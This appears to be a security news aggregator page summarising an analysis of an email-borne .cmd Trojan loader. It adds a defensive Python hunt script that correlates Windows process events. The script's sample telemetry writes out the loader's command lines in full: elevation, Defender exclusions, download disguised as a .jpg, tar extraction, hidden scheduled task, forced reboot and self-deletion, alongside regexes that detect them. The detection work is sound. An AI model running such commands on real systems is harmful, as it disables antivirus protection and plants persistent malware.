securityaffairs.com 4/5/2026, 9:20:56 AM

Email-borne .cmd Trojan evades antivirus, adds Defender exclusions

CyberSIXT Evidence Panel: source marked as original reporting

A Security Affairs piece published on 5 April 2026 describes a malicious email that delivers a .cmd loader capable of privilege escalation, antivirus evasion, payload download, persistence, and self-deletion. The analysis walks through several steps in the script, including a PowerShell call that re-launches the script with administrator privileges and another that adds Windows Defender exclusions for both the install directory and the final payload, so the dropped files are never scanned.

It shows the loader fetching a remote file with curl and saving it under a .jpg name, unpacking it (the file is actually a ZIP archive) with the tar utility that ships with Windows, and renaming an extracted executable to an innocuous name before adding it to Defender's exclusion list. The sample then creates a hidden scheduled task (named IntelGraphicsTask) for persistence, schedules a reboot to complete the installation, and finally deletes the loader script itself.
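The chain above relies entirely on built-in Windows tools (powershell, curl, tar, schtasks, shutdown, del), so the practical check is to correlate those tool invocations under one process tree rather than to alert on any single one. The following Python hunt script is an added example for this page, not code from the Security Affairs analysis: it runs over constructed process-creation events (Sysmon Event ID 1 or Security 4688 style, reduced to pid, ppid and command line), tags each event with the loader stage it resembles, groups the hits by the root process of the tree, and alerts only when several stages appear under the same root. The stage regexes are assumptions about how each step in the write-up would look on a command line, not indicators copied from the article, and all sample paths and file names are constructed.

```python
"""Hunt for the .cmd loader chain in Windows process-creation telemetry.

Added example for this page, not code from the Security Affairs analysis.
Events are dicts with pid, ppid and cmdline; the regexes below are assumptions
about each stage's command line, not indicators taken from the article.
"""
import re
from collections import defaultdict

# (stage name, pattern over the full command line). Case-insensitive because
# cmd.exe and PowerShell accept any casing and malware authors use that freely.
STAGES = [
    # Re-launch with admin rights via ShellExecute's runas verb.
    ("self_elevate", re.compile(r"powershell.*start-process.*-verb\s+runas", re.I)),
    # Defender exclusion for a path, process or extension.
    ("defender_exclusion", re.compile(r"add-mppreference.*-exclusion(path|process|extension)", re.I)),
    # Download saved under an image extension.
    ("download_as_image", re.compile(r"\bcurl(\.exe)?\b.*\s-o\s+\S+\.(jpe?g|png|gif)\b", re.I)),
    # tar extracting a file that claims to be an image (bsdtar also unpacks ZIP).
    ("tar_extract_image", re.compile(r"\btar(\.exe)?\b.*\s-x\w*\s.*\.(jpe?g|png|gif)\b", re.I)),
    # Scheduled task creation by either tool.
    ("scheduled_task", re.compile(r"(schtasks(\.exe)?\s.*?/create\b|register-scheduledtask)", re.I)),
    # Forced or timed reboot.
    ("reboot", re.compile(r"shutdown(\.exe)?\s.*?/r\b", re.I)),
    # Deleting a .cmd script: the loader removing itself.
    ("self_delete", re.compile(r"\bdel\b.*\.cmd\b", re.I)),
]


def classify(cmdline):
    """Return the set of stage names whose pattern matches this command line."""
    return {name for name, rx in STAGES if rx.search(cmdline)}


def find_root(pid, by_pid):
    """Walk ppid links up to the topmost process we have an event for."""
    seen = set()
    while pid not in seen and by_pid[pid]["ppid"] in by_pid:
        seen.add(pid)
        pid = by_pid[pid]["ppid"]
    return pid


def correlate(events):
    """Map each root pid to the union of loader stages seen in its tree.

    Caveat: a child started with -Verb RunAs is really spawned by the AppInfo
    service (svchost.exe) after the UAC prompt, so in live telemetry the ppid
    link can break there; correlate on logon session or script path as well.
    """
    by_pid = {e["pid"]: e for e in events}
    chains = defaultdict(set)
    for e in events:
        hits = classify(e["cmdline"])
        if hits:
            chains[find_root(e["pid"], by_pid)] |= hits
    return dict(chains)


def alerts(events, min_stages=3):
    """Trees showing at least min_stages distinct stages; single hits are noise."""
    return {root: sorted(stages) for root, stages in correlate(events).items()
            if len(stages) >= min_stages}


# Constructed sample telemetry: one infected tree rooted at pid 200 plus two
# benign single-stage events (a photo download and an admin's build exclusion).
SAMPLE_EVENTS = [
    {"pid": 200, "ppid": 100, "cmdline": r"cmd.exe /c C:\Users\alice\Downloads\Invoice_2026.cmd"},
    {"pid": 201, "ppid": 200, "cmdline": r"powershell -NoProfile -Command Start-Process cmd.exe -ArgumentList '/c C:\Users\alice\Downloads\Invoice_2026.cmd' -Verb RunAs"},
    {"pid": 300, "ppid": 201, "cmdline": r"cmd.exe /c C:\Users\alice\Downloads\Invoice_2026.cmd"},
    {"pid": 301, "ppid": 300, "cmdline": r"powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\IntelGraphics', 'C:\ProgramData\IntelGraphics\gfx.exe'"},
    {"pid": 302, "ppid": 300, "cmdline": r"curl.exe -s -L -o C:\ProgramData\IntelGraphics\cache.jpg https://example.invalid/cache.jpg"},
    {"pid": 303, "ppid": 300, "cmdline": r"tar.exe -xf C:\ProgramData\IntelGraphics\cache.jpg -C C:\ProgramData\IntelGraphics"},
    {"pid": 304, "ppid": 300, "cmdline": r'schtasks.exe /create /tn "IntelGraphicsTask" /tr "C:\ProgramData\IntelGraphics\gfx.exe" /sc onlogon /rl highest /f'},
    {"pid": 305, "ppid": 300, "cmdline": r"shutdown.exe /r /t 30 /f"},
    {"pid": 306, "ppid": 300, "cmdline": r'cmd.exe /c del /f /q "C:\Users\alice\Downloads\Invoice_2026.cmd"'},
    {"pid": 400, "ppid": 100, "cmdline": r"curl.exe -o C:\Users\alice\Pictures\photo.jpg https://example.com/photo.jpg"},
    {"pid": 500, "ppid": 100, "cmdline": r"powershell -Command Add-MpPreference -ExclusionPath 'D:\Builds'"},
]

if __name__ == "__main__":
    for root, stages in alerts(SAMPLE_EVENTS).items():
        print(f"root pid {root}: {len(stages)} loader stages -> {', '.join(stages)}")
```

Run stand-alone, the script reports only the tree rooted at pid 200 with all seven stages; the lone curl download and the lone Add-MpPreference call stay below the threshold, which is the point of correlating by tree instead of firing on each tool. In a real deployment the exclusion-add and the scheduled-task creation are worth their own high-severity rules when they originate from a user-writable path, and the ppid caveat in correlate() matters because UAC elevation re-parents the child.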

The analyst notes that the download, extraction, and persistence stages exist to stage a DLL and a binary, and that initial indicators point to heavy obfuscation and multiple anti-analysis tricks in those components; the preliminary static findings came from a pass with PEStudio.


Article by CyberSIXT